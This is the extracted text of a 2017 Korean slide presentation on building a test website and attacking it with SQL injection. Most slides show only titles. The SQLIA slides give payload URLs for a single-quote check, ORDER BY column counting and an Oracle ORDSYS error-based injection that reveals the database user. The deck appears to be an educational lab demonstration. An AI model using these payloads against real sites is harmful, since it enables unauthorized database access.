SQL INJECTION 2017 12 22 THE MFS HYE

  • Slides: 32
Download presentation
SQL INJECTION 2017. 12. 22 THE MFS HYE JUNG

SQL INJECTION 2017. 12. 22 THE MFS HYE JUNG

ABOUT THE PROJECT

ABOUT THE PROJECT

ABOUT THE PROJECT

ABOUT THE PROJECT

ABOUT THE PROJECT

ABOUT THE PROJECT

ABOUT THE PROJECT

ABOUT THE PROJECT

ABOUT THE PROJECT

ABOUT THE PROJECT

SERVER CONSTRUCTION

SERVER CONSTRUCTION

SERVER CONSTRUCTION

SERVER CONSTRUCTION

PREPARATION: PUTTYGEN

PREPARATION: PUTTYGEN

PREPARATION: GOOGLE

PREPARATION: GOOGLE

PREPARATION: GOOGLE

PREPARATION: GOOGLE

PREPARATION: FILEZILLA

PREPARATION: FILEZILLA

DB SERVER: ADD SWAP 3. fstab 파일에 추가 4. Swappiness 파라미터 설 정

DB SERVER: ADD SWAP 3. fstab 파일에 추가 4. Swappiness 파라미터 설 정

DB SERVER: DIRECTORIES

DB SERVER: DIRECTORIES

DB SERVER: DATABASE

DB SERVER: DATABASE

WEBSITE: MAIN PAGE

WEBSITE: MAIN PAGE

WEBSITE: LOGIN SYSTEM

WEBSITE: LOGIN SYSTEM

WEBSITE: COMMUNITY

WEBSITE: COMMUNITY

SQLIA: WEB APPLICATION

SQLIA: WEB APPLICATION

SQLIA: SQL INJECTION

SQLIA: SQL INJECTION

SQLIA: SINGLE QUOTA (‘) [ 데이터베이스 서버의 취약 여부 확인 ] SINGLE QUOTA 공격:

SQLIA: SINGLE QUOTA (‘) [ 데이터베이스 서버의 취약 여부 확인 ] SINGLE QUOTA 공격: http: //theoutofthebox. net/content. html? cboard_number=13‘

SQLIA: ORDER BY [ 컬럼의 갯수 확인 ] 원래 URL: http: //theoutofthebox. net/content. html?

SQLIA: ORDER BY [ 컬럼의 갯수 확인 ] 원래 URL: http: //theoutofthebox. net/content. html? cboard_number=13 ORDER BY 1 공격: http: //theoutofthebox. net/content. html? cboard_number=13+order+by+1

SQLIA: ORDER BY [ 컬럼의 갯수 확인 ] 원래 URL: http: //theoutofthebox. net/content. html?

SQLIA: ORDER BY [ 컬럼의 갯수 확인 ] 원래 URL: http: //theoutofthebox. net/content. html? cboard_number=13 ORDER BY 2 공격: http: //theoutofthebox. net/content. html? cboard_number=13+order+by+2

SQLIA: ORDSYS [ 호스트 명의 호출 ] 원래 URL: http: //theoutofthebox. net/content. html? cboard_number=13

SQLIA: ORDSYS [ 호스트 명의 호출 ] 원래 URL: http: //theoutofthebox. net/content. html? cboard_number=13 ORDER BY 2 공격: http: //theoutofthebox. net/content. html? cboard_number=13 +or+1+=+ORDSYS. ORD_DICOM. GETMAPPINGXPATH+(user, 'a', 'b')--

SQLIA: BLIND INJECTION

SQLIA: BLIND INJECTION

SQLIA: BLIND INJECTION

SQLIA: BLIND INJECTION

SQLIA: BLIND INJECTION

SQLIA: BLIND INJECTION

SQLIA: PHP. INI

SQLIA: PHP. INI

SQLIA: USERS AND ROLES

SQLIA: USERS AND ROLES